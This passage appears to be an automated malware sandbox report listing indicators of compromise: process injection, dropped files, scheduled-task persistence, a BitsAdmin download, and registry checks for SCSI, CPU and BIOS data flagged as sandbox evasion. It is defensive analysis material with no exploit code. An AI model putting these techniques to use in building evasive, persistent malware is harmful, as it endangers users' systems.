Soqemaeroci.exe6273333.exeWMIC.exevlIqRV07HW3kqFelCZOkt0MM.exeAM5Isb_OcTUzof9dlnE4LHY2.exeLK2tJGajftEeLSBc6rXxeDhR.exeservices64.exe1195.exe1C54.exe1937106983.exe7D61.exedwm.exeB0C6.exedescription pid process target process PID 2828 set thread context of 2996 2828 Soqemaeroci.exe cmd.exe PID 2568 set thread context of 1556 2568 6273333.exe 6273333.exe PID 10956 set thread context of 1912 10956 WMIC.exe Conhost.exe PID 10836 set thread context of 5856 10836 vlIqRV07HW3kqFelCZOkt0MM.exe vlIqRV07HW3kqFelCZOkt0MM.exe PID 10948 set thread context of 6984 10948 AM5Isb_OcTUzof9dlnE4LHY2.exe AM5Isb_OcTUzof9dlnE4LHY2.exe PID 10940 set thread context of 7508 10940 LK2tJGajftEeLSBc6rXxeDhR.exe LK2tJGajftEeLSBc6rXxeDhR.exe PID 4592 set thread context of 9064 4592 services64.exe explorer.exe PID 9464 set thread context of 8308 9464 1195.exe 1195.exe PID 4388 set thread context of 7392 4388 1C54.exe 1C54.exe PID 8160 set thread context of 5196 8160 1937106983.exe 1937106983.exe PID 6072 set thread context of 3552 6072 7D61.exe 7D61.exe PID 11588 set thread context of 5192 11588 dwm.exe dwm.exe PID 11160 set thread context of 2936 11160 B0C6.exe B0C6.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeultramediaburner.tmpqzpuyrRTVoGc4Mc2AKxk6pTB.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-KRJMT.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst001.exe qzpuyrRTVoGc4Mc2AKxk6pTB.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Windows Media Player\Relajaxebi.exe File created C:\Program Files (x86)\lighteningplayer\libvlc.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-768JV.tmp ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libssp-0.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe -
Drops file in Windows directory 28 IoCs
Processes:
msiexec.exeWerFault.exeMsiExec.exedescription ioc process File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI76A1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI92A6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6DD.tmp msiexec.exe File created C:\Windows\Installer\288dd.msi msiexec.exe File created C:\Windows\SystemTemp\~DF0A8F8D867843C990.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI556B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6357.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI72E8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIAB49.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE0C2.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF79A803EA265D5836.TMP msiexec.exe File opened for modification C:\Windows\Installer\288dd.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF565DB99B1795019D.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI7839.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB757.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSIE99D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFB81.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAD15.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFB9.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF3AA075080BB86E49.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIF313.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 31 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5680 4888 WerFault.exe Sun19de8ff4b6aefeb8.exe 5724 3796 WerFault.exe Sun19eb40faaaa9.exe 5708 4792 WerFault.exe Sun1908b94df837b3158.exe 5336 5960 WerFault.exe 2.exe 1636 2828 WerFault.exe 3215592.scr 6036 5472 WerFault.exe 5.exe 2208 3224 WerFault.exe rundll32.exe 1280 5200 WerFault.exe udptest.exe 1460 2568 WerFault.exe 6273333.exe 5952 5008 WerFault.exe Sun19262b9e49ad.exe 5976 828 WerFault.exe rundll32.exe 7432 11848 WerFault.exe GcleanerEU.exe 9844 9360 WerFault.exe rundll32.exe 12136 7776 WerFault.exe gcleaner.exe 6200 10836 WerFault.exe vlIqRV07HW3kqFelCZOkt0MM.exe 6484 10956 WerFault.exe UjiLOTXyPPXuCIfjslQsNvr0.exe 6468 10828 WerFault.exe WTiHSAoOx_dy7OYTEgv2_0xJ.exe 8212 10980 WerFault.exe McZNZuHmXVept6V_imMf5nhy.exe 8624 11888 WerFault.exe IhD_cGja2hQK007Xo3oRfmju.exe 5600 2260 WerFault.exe rR89OztMpbFDOjJIIB7g3CdE.exe 12268 10964 WerFault.exe TEhD1bOy1S_w6Qmtqwurmrov.exe 7908 8836 WerFault.exe explorer.exe 2232 6284 WerFault.exe bIp1yoESzg4Kx9i3VHOo82l7.exe 10372 11000 WerFault.exe qz1g6FwKh2_0rwbOwBR3xZ5a.exe 6864 9712 WerFault.exe rundll32.exe 7156 1464 WerFault.exe BC13.exe 11188 8160 WerFault.exe 1937106983.exe 10924 11836 WerFault.exe rundll32.exe 6540 1496 WerFault.exe DAB7.exe 11668 9228 WerFault.exe C3D2.exe 12080 11588 WerFault.exe dwm.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
LK2tJGajftEeLSBc6rXxeDhR.exe1195.exexdGrLjNVj4ogeSARaXCe282q.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI LK2tJGajftEeLSBc6rXxeDhR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1195.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1195.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI xdGrLjNVj4ogeSARaXCe282q.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI LK2tJGajftEeLSBc6rXxeDhR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI LK2tJGajftEeLSBc6rXxeDhR.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1195.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI xdGrLjNVj4ogeSARaXCe282q.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI xdGrLjNVj4ogeSARaXCe282q.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeschtasks.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 schtasks.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 9272 schtasks.exe 10164 schtasks.exe 3992 schtasks.exe 3712 schtasks.exe 1280 schtasks.exe 8828 schtasks.exe 9276 schtasks.exe 3108 schtasks.exe 11840 schtasks.exe 10256 schtasks.exe 2876 schtasks.exe 11204 schtasks.exe 8256 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2372 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeschtasks.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS schtasks.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU schtasks.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1380 taskkill.exe 10888 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
sihclient.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs 